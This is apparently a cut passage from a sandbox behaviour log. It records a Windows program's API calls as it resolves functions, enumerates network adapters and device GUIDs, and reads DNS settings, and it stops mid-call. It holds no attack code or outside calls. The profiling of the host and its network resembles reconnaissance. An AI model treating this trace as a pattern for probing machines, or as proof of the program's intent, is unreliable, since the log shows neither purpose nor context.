[0178.408] malloc (_Size=0x48) returned 0xd61690 [0178.409] _wtol (_String="0002") returned 2 [0178.410] malloc (_Size=0x48) returned 0xd61a00 [0178.411] _wtol (_String="0003") returned 3 [0178.412] malloc (_Size=0x48) returned 0xd61b90 [0178.413] _wtol (_String="0004") returned 4 [0178.414] malloc (_Size=0x48) returned 0xd61aa0 [0178.415] _wtol (_String="Configuration") returned 0 [0178.416] _wtol (_String="Properties") returned 0 [0178.434] QueryDosDeviceW (in: lpDeviceName="{017EF944-8C88-42C3-8F92-C8F7B6022F8D}", lpTargetPath=0xedc410, ucchMax=0x200 | out: lpTargetPath="\x01") returned 0x0 [0178.434] GetLastError () returned 0x2 [0178.434] DefineDosDeviceW (dwFlags=0x1, lpDeviceName="{017EF944-8C88-42C3-8F92-C8F7B6022F8D}", lpTargetPath="\\Device\\{017EF944-8C88-42C3-8F92-C8F7B6022F8D}") returned 1 [0178.441] CreateFileW (lpFileName="\\\\.\\{017EF944-8C88-42C3-8F92-C8F7B6022F8D}" (normalized: "{017ef944-8c88-42c3-8f92-c8f7b6022f8d}"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0xffffffffffffffff) returned 0xffffffffffffffff [0178.442] DefineDosDeviceW (dwFlags=0x7, lpDeviceName="{017EF944-8C88-42C3-8F92-C8F7B6022F8D}", lpTargetPath="\\Device\\{017EF944-8C88-42C3-8F92-C8F7B6022F8D}") returned 1 [0178.454] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.455] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdapterIndex") returned 0x7ffa0bb0ddb0 [0178.455] GetAdapterIndex (in: AdapterName="\\DEVICE\\TCPIP_{017EF944-8C88-42C3-8F92-C8F7B6022F8D}", IfIndex=0xedd980 | out: IfIndex=0xedd980) returned 0x0 [0178.456] FreeLibrary (hLibModule=0x7ffa0baf0000) returned 1 [0178.457] QueryDosDeviceW (in: lpDeviceName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", lpTargetPath=0xedc410, ucchMax=0x200 | out: lpTargetPath="") returned 0x0 [0178.457] GetLastError () returned 0x2 [0178.457] DefineDosDeviceW (dwFlags=0x1, lpDeviceName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", lpTargetPath="\\Device\\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}") returned 1 [0178.463] CreateFileW (lpFileName="\\\\.\\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}" (normalized: "{e25a642b-6ceb-4194-8f83-8bc82af94f5a}"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0xffffffffffffffff) returned 0xffffffffffffffff [0178.463] DefineDosDeviceW (dwFlags=0x7, lpDeviceName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", lpTargetPath="\\Device\\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}") returned 1 [0178.468] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.468] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdapterIndex") returned 0x7ffa0bb0ddb0 [0178.469] GetAdapterIndex (in: AdapterName="\\DEVICE\\TCPIP_{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", IfIndex=0xedd980 | out: IfIndex=0xedd980) returned 0x0 [0178.469] FreeLibrary (hLibModule=0x7ffa0baf0000) returned 1 [0178.471] QueryDosDeviceW (in: lpDeviceName="{9E8A7ED5-49C8-421B-A782-D46C28931105}", lpTargetPath=0xedc410, ucchMax=0x200 | out: lpTargetPath="\\Device\\NDMP6") returned 0xf [0178.471] CreateFileW (lpFileName="\\\\.\\{9E8A7ED5-49C8-421B-A782-D46C28931105}" (normalized: "\\device\\ndmp6"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0xffffffffffffffff) returned 0x454 [0178.471] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0x4, lpOverlapped=0x0) returned 1 [0178.471] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0xc, lpOverlapped=0x0) returned 1 [0178.472] CloseHandle (hObject=0x454) returned 1 [0178.474] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.475] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdapterIndex") returned 0x7ffa0bb0ddb0 [0178.475] GetAdapterIndex (in: AdapterName="\\DEVICE\\TCPIP_{9E8A7ED5-49C8-421B-A782-D46C28931105}", IfIndex=0xedd980 | out: IfIndex=0xedd980) returned 0x0 [0178.476] FreeLibrary (hLibModule=0x7ffa0baf0000) returned 1 [0178.477] QueryDosDeviceW (in: lpDeviceName="{C2998852-8A8B-426B-AAB1-8880E47F8B1A}", lpTargetPath=0xedc410, ucchMax=0x200 | out: lpTargetPath="\\Device\\NDMP7") returned 0xf [0178.477] CreateFileW (lpFileName="\\\\.\\{C2998852-8A8B-426B-AAB1-8880E47F8B1A}" (normalized: "\\device\\ndmp7"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0xffffffffffffffff) returned 0x454 [0178.477] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0x4, lpOverlapped=0x0) returned 1 [0178.477] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0x20, lpOverlapped=0x0) returned 1 [0178.478] CloseHandle (hObject=0x454) returned 1 [0178.481] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.481] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdapterIndex") returned 0x7ffa0bb0ddb0 [0178.481] GetAdapterIndex (in: AdapterName="\\DEVICE\\TCPIP_{C2998852-8A8B-426B-AAB1-8880E47F8B1A}", IfIndex=0xedd980 | out: IfIndex=0xedd980) returned 0x0 [0178.482] FreeLibrary (hLibModule=0x7ffa0baf0000) returned 1 [0178.483] QueryDosDeviceW (in: lpDeviceName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", lpTargetPath=0xedc410, ucchMax=0x200 | out: lpTargetPath="\\Device\\NDMP5") returned 0xf [0178.484] CreateFileW (lpFileName="\\\\.\\{E96D977E-F067-4CE9-924D-F6E0A04729E4}" (normalized: "\\device\\ndmp5"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0xffffffffffffffff) returned 0x454 [0178.484] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0x4, lpOverlapped=0x0) returned 1 [0178.484] DeviceIoControl (in: hDevice=0x454, dwIoControlCode=0x170002, lpInBuffer=0xedc870*, nInBufferSize=0x4, lpOutBuffer=0xedc8b0, nOutBufferSize=0x1000, lpBytesReturned=0xedc874, lpOverlapped=0x0 | out: lpInBuffer=0xedc870*, lpOutBuffer=0xedc8b0*, lpBytesReturned=0xedc874*=0x6, lpOverlapped=0x0) returned 1 [0178.484] CloseHandle (hObject=0x454) returned 1 [0178.488] malloc (_Size=0x18) returned 0xd661d0 [0178.488] malloc (_Size=0x18) returned 0xd662d0 [0178.488] SafeArrayPutElement (psa=0x5719b0, rgIndices=0xedd570, pv=0x4b8cf8) returned 0x0 [0178.488] malloc (_Size=0x18) returned 0xd65d90 [0178.488] SafeArrayPutElement (psa=0x572130, rgIndices=0xedd570, pv=0x572168) returned 0x0 [0178.488] free (_Block=0xd65d90) [0178.488] free (_Block=0xd662d0) [0178.488] malloc (_Size=0x18) returned 0xd66150 [0178.488] SafeArrayPutElement (psa=0x5719b0, rgIndices=0xedd570, pv=0x4b8cf8) returned 0x0 [0178.488] malloc (_Size=0x18) returned 0xd66230 [0178.488] SafeArrayPutElement (psa=0x572130, rgIndices=0xedd570, pv=0x4e9588) returned 0x0 [0178.489] free (_Block=0xd66230) [0178.489] free (_Block=0xd66150) [0178.489] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58af50 [0178.489] SafeArrayGetDim (psa=0x5719b0) returned 0x1 [0178.489] SafeArrayGetLBound (in: psa=0x5719b0, nDim=0x1, plLbound=0xedd260 | out: plLbound=0xedd260) returned 0x0 [0178.489] SafeArrayGetUBound (in: psa=0x5719b0, nDim=0x1, plUbound=0xedd280 | out: plUbound=0xedd280) returned 0x0 [0178.489] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x4f9c60 [0178.489] SafeArrayGetDim (psa=0x5719b0) returned 0x1 [0178.489] SafeArrayGetUBound (in: psa=0x5719b0, nDim=0x1, plUbound=0xedd228 | out: plUbound=0xedd228) returned 0x0 [0178.489] SafeArrayGetElemsize (psa=0x5719b0) returned 0x8 [0178.489] SafeArrayGetElement (in: psa=0x5719b0, rgIndices=0xedd118, pv=0xedd120 | out: pv=0xedd120) returned 0x0 [0178.489] memcpy (in: _Dst=0xedd128, _Src=0x5149f0, _Size=0x8 | out: _Dst=0xedd128) returned 0xedd128 [0178.490] memcpy (in: _Dst=0xedd128, _Src=0x5149f8, _Size=0x8 | out: _Dst=0xedd128) returned 0xedd128 [0178.490] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4f9c60) returned 1 [0178.491] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58af50) returned 1 [0178.491] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a4d0 [0178.491] SafeArrayGetDim (psa=0x572130) returned 0x1 [0178.491] SafeArrayGetLBound (in: psa=0x572130, nDim=0x1, plLbound=0xedd260 | out: plLbound=0xedd260) returned 0x0 [0178.491] SafeArrayGetUBound (in: psa=0x572130, nDim=0x1, plUbound=0xedd280 | out: plUbound=0xedd280) returned 0x0 [0178.491] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x4f9c60 [0178.491] SafeArrayGetDim (psa=0x572130) returned 0x1 [0178.491] SafeArrayGetUBound (in: psa=0x572130, nDim=0x1, plUbound=0xedd228 | out: plUbound=0xedd228) returned 0x0 [0178.491] SafeArrayGetElemsize (psa=0x572130) returned 0x8 [0178.491] SafeArrayGetElement (in: psa=0x572130, rgIndices=0xedd118, pv=0xedd120 | out: pv=0xedd120) returned 0x0 [0178.492] memcpy (in: _Dst=0xedd128, _Src=0x5148f0, _Size=0x8 | out: _Dst=0xedd128) returned 0xedd128 [0178.492] memcpy (in: _Dst=0xedd128, _Src=0x5148f8, _Size=0x8 | out: _Dst=0xedd128) returned 0xedd128 [0178.493] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4f9c60) returned 1 [0178.493] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58a4d0) returned 1 [0178.493] free (_Block=0xd661d0) [0178.496] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.496] GetProcAddress (hModule=0x7ffa147c0000, lpProcName=0x10) returned 0x7ffa147d0e10 [0178.496] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd420 | out: lpflOldProtect=0xedd420*=0x4) returned 1 [0178.497] malloc (_Size=0x18) returned 0xd663f0 [0178.497] SafeArrayPutElement (psa=0x571770, rgIndices=0xedd570, pv=0x4e9588) returned 0x0 [0178.497] SafeArrayPutElement (psa=0x571ab0, rgIndices=0xedd570, pv=0xd66f6c) returned 0x0 [0178.497] free (_Block=0xd663f0) [0178.497] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a150 [0178.497] SafeArrayGetDim (psa=0x571770) returned 0x1 [0178.497] SafeArrayGetLBound (in: psa=0x571770, nDim=0x1, plLbound=0xedd260 | out: plLbound=0xedd260) returned 0x0 [0178.497] SafeArrayGetUBound (in: psa=0x571770, nDim=0x1, plUbound=0xedd280 | out: plUbound=0xedd280) returned 0x0 [0178.497] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x4f9c60 [0178.497] SafeArrayGetDim (psa=0x571770) returned 0x1 [0178.497] SafeArrayGetUBound (in: psa=0x571770, nDim=0x1, plUbound=0xedd228 | out: plUbound=0xedd228) returned 0x0 [0178.497] SafeArrayGetElemsize (psa=0x571770) returned 0x8 [0178.497] SafeArrayGetElement (in: psa=0x571770, rgIndices=0xedd118, pv=0xedd120 | out: pv=0xedd120) returned 0x0 [0178.498] memcpy (in: _Dst=0xedd128, _Src=0x1222e20, _Size=0x8 | out: _Dst=0xedd128) returned 0xedd128 [0178.498] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4f9c60) returned 1 [0178.498] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58a150) returned 1 [0178.498] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a850 [0178.499] SafeArrayGetDim (psa=0x571ab0) returned 0x1 [0178.499] SafeArrayGetLBound (in: psa=0x571ab0, nDim=0x1, plLbound=0xedd260 | out: plLbound=0xedd260) returned 0x0 [0178.499] SafeArrayGetUBound (in: psa=0x571ab0, nDim=0x1, plUbound=0xedd280 | out: plUbound=0xedd280) returned 0x0 [0178.499] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x4f9c60 [0178.499] SafeArrayGetDim (psa=0x571ab0) returned 0x1 [0178.499] SafeArrayGetUBound (in: psa=0x571ab0, nDim=0x1, plUbound=0xedd228 | out: plUbound=0xedd228) returned 0x0 [0178.499] SafeArrayGetElemsize (psa=0x571ab0) returned 0x4 [0178.499] SafeArrayGetElement (in: psa=0x571ab0, rgIndices=0xedd120, pv=0xedd170 | out: pv=0xedd170) returned 0x0 [0178.499] SafeArrayGetElement (in: psa=0x571ab0, rgIndices=0xedd120, pv=0xedd170 | out: pv=0xedd170) returned 0x0 [0178.500] memcpy (in: _Dst=0xedd128, _Src=0x1222ee0, _Size=0x4 | out: _Dst=0xedd128) returned 0xedd128 [0178.500] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4f9c60) returned 1 [0178.500] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58a850) returned 1 [0178.502] _wtol (_String="1659538869") returned 1659538869 [0178.502] _wtol (_String="1659535269") returned 1659535269 [0178.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a6d0 [0178.507] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58a6d0) returned 1 [0178.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x589150 [0178.508] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x589150) returned 1 [0178.508] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x589d50 [0178.509] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x589d50) returned 1 [0178.580] GetProcessHeap () returned 0x4a0000 [0178.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c0) returned 0x11e3370 [0178.580] GetAdaptersAddresses (in: Family=0x0, Flags=0x6f, Reserved=0x0, AdapterAddresses=0x11e3370, SizePointer=0xedd0c0*=0x1c0 | out: AdapterAddresses=0x11e3370*(Alignment=0x0, Length=0x0, IfIndex=0x0, Next=0x0, AdapterName=0x0, FirstUnicastAddress=0x0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix=0x0, Description=0x0, FriendlyName=0x0, PhysicalAddress=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x0, Flags=0x0, DdnsEnabled=0x0, RegisterAdapterSuffix=0x0, Dhcpv4Enabled=0x0, ReceiveOnly=0x0, NoMulticast=0x0, Ipv6OtherStatefulConfig=0x0, NetbiosOverTcpipEnabled=0x0, Ipv4Enabled=0x0, Ipv6Enabled=0x0, Ipv6ManagedAddressConfigurationSupported=0x0, Mtu=0x0, IfType=0x0, OperStatus=0x0, Ipv6IfIndex=0x0, ZoneIndices=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0), FirstPrefix=0x0, TransmitLinkSpeed=0x0, ReceiveLinkSpeed=0x0, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0x0, Ipv6Metric=0x0, Luid=0x0, Dhcpv4Server.lpSockaddr=0x0, Dhcpv4Server.iSockaddrLength=0, CompartmentId=0x0, NetworkGuid=0x0, ConnectionType=0x0, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0x0, Dhcpv6Iaid=0x0, FirstDnsSuffix=0x0), SizePointer=0xedd0c0*=0x9a8) returned 0x6f [0178.584] GetProcessHeap () returned 0x4a0000 [0178.584] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x11e3370) returned 1 [0178.584] GetProcessHeap () returned 0x4a0000 [0178.584] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x9a8) returned 0x11e3b90 [0178.584] GetAdaptersAddresses (in: Family=0x0, Flags=0x6f, Reserved=0x0, AdapterAddresses=0x11e3b90, SizePointer=0xedd0c0*=0x9a8 | out: AdapterAddresses=0x11e3b90*(Alignment=0x6000001c0, Length=0x1c0, IfIndex=0x6, Next=0x11e3e00, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x14, [2]=0xc6, [3]=0x42, [4]=0xf0, [5]=0x9, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x11e3d50*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0xedd0c0*=0x9a8) returned 0x0 [0178.603] GetProcessHeap () returned 0x4a0000 [0178.603] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x11e3b90) returned 1 [0178.606] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.607] LoadLibraryExA (lpLibFileName="DNSAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa11800000 [0178.612] GetProcAddress (hModule=0x7ffa11800000, lpProcName="DnsQueryConfigAllocEx") returned 0x7ffa11806cf0 [0178.612] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd4f0 | out: lpflOldProtect=0xedd4f0*=0x4) returned 1 [0178.612] DnsQueryConfigAllocEx () returned 0x12180c0 [0178.646] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.646] GetProcAddress (hModule=0x7ffa11800000, lpProcName="DnsFreeConfigStructure") returned 0x7ffa1183c9a0 [0178.646] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd4f0 | out: lpflOldProtect=0xedd4f0*=0x4) returned 1 [0178.646] DnsFreeConfigStructure () returned 0x1 [0178.647] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.647] GetProcAddress (hModule=0x7ffa11800000, lpProcName="DnsQueryConfigDword") returned 0x7ffa11806bc0 [0178.648] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd4f0 | out: lpflOldProtect=0xedd4f0*=0x4) returned 1 [0178.648] DnsQueryConfigDword () returned 0x1 [0178.648] DnsQueryConfigDword () returned 0x0 [0178.649] malloc (_Size=0x18) returned 0xd66030 [0178.649] SafeArrayPutElement (psa=0x571330, rgIndices=0xedd280, pv=0x4e9588) returned 0x0 [0178.649] free (_Block=0xd66030) [0178.651] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a850 [0178.651] SafeArrayGetDim (psa=0x571330) returned 0x1 [0178.651] SafeArrayGetLBound (in: psa=0x571330, nDim=0x1, plLbound=0xedd300 | out: plLbound=0xedd300) returned 0x0 [0178.651] SafeArrayGetUBound (in: psa=0x571330, nDim=0x1, plUbound=0xedd320 | out: plUbound=0xedd320) returned 0x0 [0178.651] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x11e3c10 [0178.651] SafeArrayGetDim (psa=0x571330) returned 0x1 [0178.651] SafeArrayGetUBound (in: psa=0x571330, nDim=0x1, plUbound=0xedd2c8 | out: plUbound=0xedd2c8) returned 0x0 [0178.651] SafeArrayGetElemsize (psa=0x571330) returned 0x8 [0178.651] SafeArrayGetElement (in: psa=0x571330, rgIndices=0xedd1b8, pv=0xedd1c0 | out: pv=0xedd1c0) returned 0x0 [0178.651] memcpy (in: _Dst=0xedd1c8, _Src=0x1222f50, _Size=0x8 | out: _Dst=0xedd1c8) returned 0xedd1c8 [0178.652] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x11e3c10) returned 1 [0178.653] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, 